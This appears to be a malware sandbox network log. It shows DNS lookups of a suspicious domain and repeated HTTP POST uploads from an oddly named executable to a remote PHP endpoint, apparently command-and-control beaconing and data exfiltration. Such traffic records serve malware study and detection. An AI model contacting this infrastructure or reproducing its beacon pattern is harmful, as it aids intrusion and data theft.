                              Aug 25, 2024 15:45:02.036606073 CEST805996580.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.037067890 CEST5996580192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.091202974 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.096117020 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.097060919 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.097172976 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.103880882 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.444523096 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.449376106 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.449398041 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.449408054 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.759957075 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:02.803790092 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:02.956305027 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.006903887 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.094523907 CEST5995880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.094630957 CEST5996480192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.097012997 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.097932100 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.102957964 CEST805996680.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.103058100 CEST5996680192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.103476048 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.103554010 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.103687048 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.109508991 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.460359097 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.465401888 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.465429068 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.465439081 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.768834114 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.819418907 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:03.902116060 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:03.944461107 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.019093990 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.019388914 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.026401997 CEST805996780.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.026542902 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.029102087 CEST5996780192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.029145956 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.029376984 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.034341097 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.382008076 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.389507055 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.389522076 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.389530897 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.712289095 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.756948948 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.893264055 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:04.944571972 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:04.999630928 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.006390095 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.006525993 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.008440018 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.013350964 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.047703981 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.052906990 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.053018093 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.053097010 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.058162928 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.366764069 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.371854067 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.371957064 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.397761106 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.402690887 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.402867079 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.402882099 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.673413992 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.725688934 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.766819954 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.801935911 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.819416046 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.850660086 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:05.901094913 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:05.944417000 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.018779039 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.018817902 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.018986940 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.019604921 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.024112940 CEST805996980.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.024224997 CEST5996980192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.024979115 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.025053978 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.025188923 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.026221991 CEST805996880.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.026279926 CEST5996880192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.026314974 CEST805997080.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.026371002 CEST5997080192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.030071020 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.382245064 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.387216091 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.387319088 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.387329102 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.696506023 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.743274927 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:06.830126047 CEST805997180.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:06.881931067 CEST5997180192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.197391987 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.202338934 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:07.202471018 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.202613115 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:07.207556009 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.788630962 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.788970947 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.789200068 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:08.789294004 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:08.790740013 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:13.602370024 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:13.913201094 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:14.017138004 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.017232895 CEST5997280192.168.2.580.211.144.156
                              Aug 25, 2024 15:45:14.017394066 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.018649101 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.018656969 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.022559881 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.022571087 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.315907955 CEST805997280.211.144.156192.168.2.5
                              Aug 25, 2024 15:45:14.366313934 CEST5997280192.168.2.580.211.144.156
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 25, 2024 15:43:28.178508043 CEST | 57665 | 53 | 192.168.2.5 | 1.1.1.1
Aug 25, 2024 15:43:28.530394077 CEST | 53 | 57665 | 1.1.1.1 | 192.168.2.5
Aug 25, 2024 15:43:33.061815023 CEST | 53 | 49466 | 162.159.36.2 | 192.168.2.5
Aug 25, 2024 15:43:33.583275080 CEST | 64555 | 53 | 192.168.2.5 | 1.1.1.1
Aug 25, 2024 15:43:33.591088057 CEST | 53 | 64555 | 1.1.1.1 | 192.168.2.5
Aug 25, 2024 15:43:35.400705099 CEST | 53606 | 53 | 192.168.2.5 | 1.1.1.1
Aug 25, 2024 15:43:36.177900076 CEST | 53 | 53606 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 25, 2024 15:43:28.178508043 CEST | 192.168.2.5 | 1.1.1.1 | 0xdcfb | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:43:33.583275080 CEST | 192.168.2.5 | 1.1.1.1 | 0xac19 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Aug 25, 2024 15:43:35.400705099 CEST | 192.168.2.5 | 1.1.1.1 | 0x4a2 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 25, 2024 15:43:28.530394077 CEST | 1.1.1.1 | 192.168.2.5 | 0xdcfb | No error (0) | 373292cm.nyashka.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false
Aug 25, 2024 15:43:33.591088057 CEST | 1.1.1.1 | 192.168.2.5 | 0xac19 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Aug 25, 2024 15:43:36.177900076 CEST | 1.1.1.1 | 192.168.2.5 | 0x4a2 | No error (0) | 373292cm.nyashka.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false
                              • 373292cm.nyashka.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe

Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:43:28.549983025 CEST | 345 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 373292cm.nyashka.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Aug 25, 2024 15:43:29.218148947 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:43:29.322532892 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 25 Aug 2024 13:43:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1320
Connection: keep-alive
Aug 25, 2024 15:43:30.143950939 CEST | 321 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 373292cm.nyashka.top
Content-Length: 384
Expect: 100-continue
Aug 25, 2024 15:43:30.348388910 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:43:30.635669947 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 25 Aug 2024 13:43:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe

Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:43:30.960289001 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 373292cm.nyashka.top
Content-Length: 1808
Expect: 100-continue
Connection: Keep-Alive
                              Aug 25, 2024 15:43:31.319657087 CEST | 1808 | OUT
                              Aug 25, 2024 15:43:31.628186941 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:31.758878946 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.5 | 49716 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:31.135437965 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:31.491549015 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:31.805124044 CEST | 25 | IN | HTTP/1.1 100 Continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.5 | 49717 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:32.522006035 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:32.866425991 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:33.188508987 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:33.318423033 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.5 | 59854 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:33.497642994 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:33.850769043 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:34.179826021 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:34.317744017 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.5 | 59856 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:34.469352007 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:34.869596958 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:35.141046047 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:35.274677992 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:43:35.509973049 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.5 | 59859 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:36.210166931 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:36.569796085 CEST | 2504 | OUT


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.5 | 59862 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:36.865154982 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:37.215137959 CEST | 1808 | OUT
                              Aug 25, 2024 15:43:37.550293922 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:37.681351900 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.5 | 59864 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:38.061762094 CEST | 324 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 134140
                              Expect: 100-continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.5 | 59865 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:38.164678097 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:38.522892952 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:38.846167088 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:38.977768898 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              10 | 192.168.2.5 | 59866 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:39.197925091 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:39.553985119 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:39.867302895 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:40.066488981 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              11 | 192.168.2.5 | 59867 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:40.612499952 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:40.960154057 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:41.302401066 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:41.435739040 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              12 | 192.168.2.5 | 59868 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:41.563036919 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:43:41.913486958 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:42.237765074 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:42.367547035 CEST | 158 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              13 | 192.168.2.5 | 59869 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:42.495603085 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              14 | 192.168.2.5 | 59870 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:42.743825912 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:43.117718935 CEST | 1828 | OUT
                              Aug 25, 2024 15:43:43.418952942 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:43.551611900 CEST | 308 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              15 | 192.168.2.5 | 59871 | 80.211.144.156 | 80 | 6968 | C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 25, 2024 15:43:43.203946114 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:43.553869963 CEST | 2504 | OUT
                              Aug 25, 2024 15:43:44.014553070 CEST | 25 | IN | HTTP/1.1 100 Continue
